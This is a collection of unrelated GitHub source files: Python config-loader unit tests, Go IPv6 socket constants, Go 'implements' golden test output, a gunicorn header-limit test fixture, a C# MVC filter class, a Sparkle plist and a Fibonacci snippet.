self.assertFalse(hasattr(ans, 'topParamx'))
def test_load_type_cast(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='topParam1', type=int)
db.add_param(p)
p = ConfigParameter(name='topParam2', type=None)
db.add_param(p)
p = ConfigParameter(name='topParamx', type=float)
db.add_param(p)
ans = loader.load(db, self.config_file)
self.assertEqual(type(ans.topParam1), int)
self.assertEqual(ans.topParam1, 1)
self.assertEqual(type(ans.topParam2), str)
self.assertEqual(ans.topParam2, '"s-value"')
self.assertFalse(hasattr(ans, 'topParamx'))
def test_config_section(self):
loader = self.getloader()
db = getdb()
getSection = lambda secname: {'section': secname}
p = ConfigParameter(name='topParam2', loader_opts={'conffile':getSection(None)})
db.add_param(p)
p = ConfigParameter(name='secParam1', loader_opts={'conffile':getSection('section1')})
db.add_param(p)
p = ConfigParameter(name='secParam2', loader_opts={'conffile':getSection('section3')})
db.add_param(p)
p = ConfigParameter(name='secParamx', loader_opts={'conffile':getSection('sectionx')})
db.add_param(p)
ans = loader.load(db, self.config_file)
self.assertEqual(ans.topParam2, '"s-value"')
self.assertEqual(ans.secParam1, '1 2 3')
self.assertEqual(ans.secParam2, 'somevalue')
self.assertFalse(hasattr(ans, 'topParamx'))
def test_load_default(self):
loader = self.getloader()
db = getdb()
p = ConfigParameter(name='topParam3', defaults='def-1')
db.add_param(p)
p = ConfigParameter(
name='secParamx',
type=float, defaults='0',
loader_opts={'conffile':{'section':'section3'}}
)
db.add_param(p)
ans = loader.load(db, self.config_file, generate_default=True)
self.assertEqual(ans.topParam3, '')
self.assertEqual(type(ans.secParamx), float)
self.assertEqual(ans.secParamx, float(0))
class TestConfigFileDumper(unittest.TestCase):
def setUp(self):
self.conf = Namespace()
choices = ['cal1', 'cal2', 'cal3']
setattr(self.conf, 'intparam', 0x77992213)
setattr(self.conf, 'strparam', 'a complicat3d string#!')
setattr(self.conf, 'trueparam', True)
setattr(self.conf, 'falseparam', False)
setattr(self.conf, 'choiceparam', choices[1])
self.db = getdb()
p = ConfigParameter(name='intparam', type=int)
self.db.add_param(p)
p = ConfigParameter(name='strparam', type=str)
self.db.add_param(p)
p = ConfigParameter(name='trueparam', type=bool,
loader_opts={'conffile':{'section':'section_1'}})
self.db.add_param(p)
p = ConfigParameter(name='falseparam', type=bool,
loader_opts={'conffile':{
'converter':lambda x: True if bool(x) and x.lower() != 'false' else False
}})
self.db.add_param(p)
p = ConfigParameter(name='choiceparam', choices=choices)
self.db.add_param(p)
def getloader(self):
return ConfigFileLoader()
def getdumper(self):
return ConfigFileDumper()
def test_dump_config(self):
buf = StringIO()
loader = self.getloader()
dumper = self.getdumper()
ret = dumper.dump(self.db, self.conf, buf)
self.assertNotEqual(ret, 0)
buf.seek(0)
ans = loader.load(self.db, buf)
for k, v in vars(self.conf).items():
self.assertTrue(hasattr(ans, k))
self.assertEqual(type(getattr(ans, k)), type(v))
self.assertEqual(getattr(ans, k), v)
self.assertEqual(ans, self.conf)
class TestOtherUtil(unittest.TestCase):
def test_merge(self):
ns1 = Namespace()
ns2 = Namespace()
ns1.param1 = 123
ns2.param1 = 456
ns1.parama = 'a'
ns2.paramb = ('1', 2, 's')
ans = config.merge_config(ns1, ns2)
self.assertEqual(ns1.param1, 123)
self.assertEqual(ns2.param1, 456)
self.assertEqual(ans.param1, 456)
self.assertEqual(ns1.parama, 'a')
self.assertFalse(hasattr(ns2, 'parama'))
self.assertEqual(ans.parama, 'a')
self.assertFalse(hasattr(ns1, 'paramb'))
self.assertEqual(ns2.paramb, ('1', 2, 's'))
self.assertEqual(ans.paramb, ('1', 2, 's'))
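# Illustrative sketch, not part of the original test suite: a typical way the
# pieces exercised above fit together -- defaults generated first, then
# command-line values merged on top. The parameter names are made up.
def _example_build_config(argv):
    db = ConfigDatabase('example', description='example program')
    db.add_param(ConfigParameter(name='output', defaults='wallpaper.jpg'))
    db.add_param(ConfigParameter(name='retries', type=int, defaults=3))
    defaults = DefaultValueLoader().load(db)
    cli_args = CommandLineArgumentsLoader().load(db, argv)
    return config.merge_config(defaults, cli_args)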
| {
"pile_set_name": "Github"
} |
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs defs_linux.go
package ipv6
const (
sysIPV6_ADDRFORM = 0x1
sysIPV6_2292PKTINFO = 0x2
sysIPV6_2292HOPOPTS = 0x3
sysIPV6_2292DSTOPTS = 0x4
sysIPV6_2292RTHDR = 0x5
sysIPV6_2292PKTOPTIONS = 0x6
sysIPV6_CHECKSUM = 0x7
sysIPV6_2292HOPLIMIT = 0x8
sysIPV6_NEXTHOP = 0x9
sysIPV6_FLOWINFO = 0xb
sysIPV6_UNICAST_HOPS = 0x10
sysIPV6_MULTICAST_IF = 0x11
sysIPV6_MULTICAST_HOPS = 0x12
sysIPV6_MULTICAST_LOOP = 0x13
sysIPV6_ADD_MEMBERSHIP = 0x14
sysIPV6_DROP_MEMBERSHIP = 0x15
sysMCAST_JOIN_GROUP = 0x2a
sysMCAST_LEAVE_GROUP = 0x2d
sysMCAST_JOIN_SOURCE_GROUP = 0x2e
sysMCAST_LEAVE_SOURCE_GROUP = 0x2f
sysMCAST_BLOCK_SOURCE = 0x2b
sysMCAST_UNBLOCK_SOURCE = 0x2c
sysMCAST_MSFILTER = 0x30
sysIPV6_ROUTER_ALERT = 0x16
sysIPV6_MTU_DISCOVER = 0x17
sysIPV6_MTU = 0x18
sysIPV6_RECVERR = 0x19
sysIPV6_V6ONLY = 0x1a
sysIPV6_JOIN_ANYCAST = 0x1b
sysIPV6_LEAVE_ANYCAST = 0x1c
sysIPV6_FLOWLABEL_MGR = 0x20
sysIPV6_FLOWINFO_SEND = 0x21
sysIPV6_IPSEC_POLICY = 0x22
sysIPV6_XFRM_POLICY = 0x23
sysIPV6_RECVPKTINFO = 0x31
sysIPV6_PKTINFO = 0x32
sysIPV6_RECVHOPLIMIT = 0x33
sysIPV6_HOPLIMIT = 0x34
sysIPV6_RECVHOPOPTS = 0x35
sysIPV6_HOPOPTS = 0x36
sysIPV6_RTHDRDSTOPTS = 0x37
sysIPV6_RECVRTHDR = 0x38
sysIPV6_RTHDR = 0x39
sysIPV6_RECVDSTOPTS = 0x3a
sysIPV6_DSTOPTS = 0x3b
sysIPV6_RECVPATHMTU = 0x3c
sysIPV6_PATHMTU = 0x3d
sysIPV6_DONTFRAG = 0x3e
sysIPV6_RECVTCLASS = 0x42
sysIPV6_TCLASS = 0x43
sysIPV6_ADDR_PREFERENCES = 0x48
sysIPV6_PREFER_SRC_TMP = 0x1
sysIPV6_PREFER_SRC_PUBLIC = 0x2
sysIPV6_PREFER_SRC_PUBTMP_DEFAULT = 0x100
sysIPV6_PREFER_SRC_COA = 0x4
sysIPV6_PREFER_SRC_HOME = 0x400
sysIPV6_PREFER_SRC_CGA = 0x8
sysIPV6_PREFER_SRC_NONCGA = 0x800
sysIPV6_MINHOPCOUNT = 0x49
sysIPV6_ORIGDSTADDR = 0x4a
sysIPV6_RECVORIGDSTADDR = 0x4a
sysIPV6_TRANSPARENT = 0x4b
sysIPV6_UNICAST_IF = 0x4c
sysICMPV6_FILTER = 0x1
sysICMPV6_FILTER_BLOCK = 0x1
sysICMPV6_FILTER_PASS = 0x2
sysICMPV6_FILTER_BLOCKOTHERS = 0x3
sysICMPV6_FILTER_PASSONLY = 0x4
sysSOL_SOCKET = 0x1
sysSO_ATTACH_FILTER = 0x1a
sizeofKernelSockaddrStorage = 0x80
sizeofSockaddrInet6 = 0x1c
sizeofInet6Pktinfo = 0x14
sizeofIPv6Mtuinfo = 0x20
sizeofIPv6FlowlabelReq = 0x20
sizeofIPv6Mreq = 0x14
sizeofGroupReq = 0x88
sizeofGroupSourceReq = 0x108
sizeofICMPv6Filter = 0x20
sizeofSockFprog = 0x10
)
type kernelSockaddrStorage struct {
Family uint16
X__data [126]int8
}
type sockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
}
type inet6Pktinfo struct {
Addr [16]byte /* in6_addr */
Ifindex int32
}
type ipv6Mtuinfo struct {
Addr sockaddrInet6
Mtu uint32
}
type ipv6FlowlabelReq struct {
Dst [16]byte /* in6_addr */
Label uint32
Action uint8
Share uint8
Flags uint16
Expires uint16
Linger uint16
X__flr_pad uint32
}
type ipv6Mreq struct {
Multiaddr [16]byte /* in6_addr */
Ifindex int32
}
type groupReq struct {
Interface uint32
Pad_cgo_0 [4]byte
Group kernelSockaddrStorage
}
type groupSourceReq struct {
Interface uint32
Pad_cgo_0 [4]byte
Group kernelSockaddrStorage
Source kernelSockaddrStorage
}
type icmpv6Filter struct {
Data [8]uint32
}
type sockFProg struct {
Len uint16
Pad_cgo_0 [6]byte
Filter *sockFilter
}
type sockFilter struct {
Code uint16
Jt uint8
Jf uint8
K uint32
}
| {
"pile_set_name": "Github"
} |
-------- @implements E --------
{
"type": {
"name": "implements-json.E",
"pos": "testdata/src/implements-json/main.go:10:6",
"kind": "interface"
}
}
-------- @implements F --------
{
"type": {
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
},
"to": [
{
"name": "*implements-json.C",
"pos": "testdata/src/implements-json/main.go:21:6",
"kind": "pointer"
},
{
"name": "implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "struct"
},
{
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
}
]
}
-------- @implements FG --------
{
"type": {
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
},
"to": [
{
"name": "*implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "pointer"
}
],
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
]
}
-------- @implements slice --------
{
"type": {
"name": "[]int",
"pos": "-",
"kind": "slice"
}
}
-------- @implements C --------
{
"type": {
"name": "implements-json.C",
"pos": "testdata/src/implements-json/main.go:21:6",
"kind": "basic"
},
"fromptr": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
]
}
-------- @implements starC --------
{
"type": {
"name": "*implements-json.C",
"pos": "testdata/src/implements-json/main.go:21:6",
"kind": "pointer"
},
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
]
}
-------- @implements D --------
{
"type": {
"name": "implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "struct"
},
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
}
],
"fromptr": [
{
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
}
]
}
-------- @implements starD --------
{
"type": {
"name": "*implements-json.D",
"pos": "testdata/src/implements-json/main.go:22:6",
"kind": "pointer"
},
"from": [
{
"name": "implements-json.F",
"pos": "testdata/src/implements-json/main.go:12:6",
"kind": "interface"
},
{
"name": "implements-json.FG",
"pos": "testdata/src/implements-json/main.go:16:6",
"kind": "interface"
}
]
}
| {
"pile_set_name": "Github"
} |
from gunicorn.config import Config
from gunicorn.http.errors import LimitRequestHeaders
request = LimitRequestHeaders
cfg = Config()
cfg.set('limit_request_field_size', 98)
| {
"pile_set_name": "Github"
} |
using System.Web;
using System.Web.Mvc;
namespace Sample.WebApp
{
public class FilterConfig
{
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute());
}
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>IBClasses</key>
<array>
<dict>
<key>CLASS</key>
<string>SUWindowController</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>SUPERCLASS</key>
<string>NSWindowController</string>
</dict>
<dict>
<key>CLASS</key>
<string>NSApplication</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>SUPERCLASS</key>
<string>NSResponder</string>
</dict>
<dict>
<key>ACTIONS</key>
<dict>
<key>installUpdate</key>
<string>id</string>
<key>remindMeLater</key>
<string>id</string>
<key>skipThisVersion</key>
<string>id</string>
</dict>
<key>CLASS</key>
<string>SUUpdateAlert</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>OUTLETS</key>
<dict>
<key>delegate</key>
<string>id</string>
<key>description</key>
<string>NSTextField</string>
<key>releaseNotesView</key>
<string>WebView</string>
</dict>
<key>SUPERCLASS</key>
<string>SUWindowController</string>
</dict>
<dict>
<key>CLASS</key>
<string>FirstResponder</string>
<key>LANGUAGE</key>
<string>ObjC</string>
<key>SUPERCLASS</key>
<string>NSObject</string>
</dict>
<dict>
<key>CLASS</key>
<string>NSObject</string>
<key>LANGUAGE</key>
<string>ObjC</string>
</dict>
</array>
<key>IBVersion</key>
<string>1</string>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
/Sequence
fib:{<0;1> {x,<x[-1]+x[-2]>}/ range[x]}
/nth
fibn:{fib[x][x]}
| {
"pile_set_name": "Github"
} |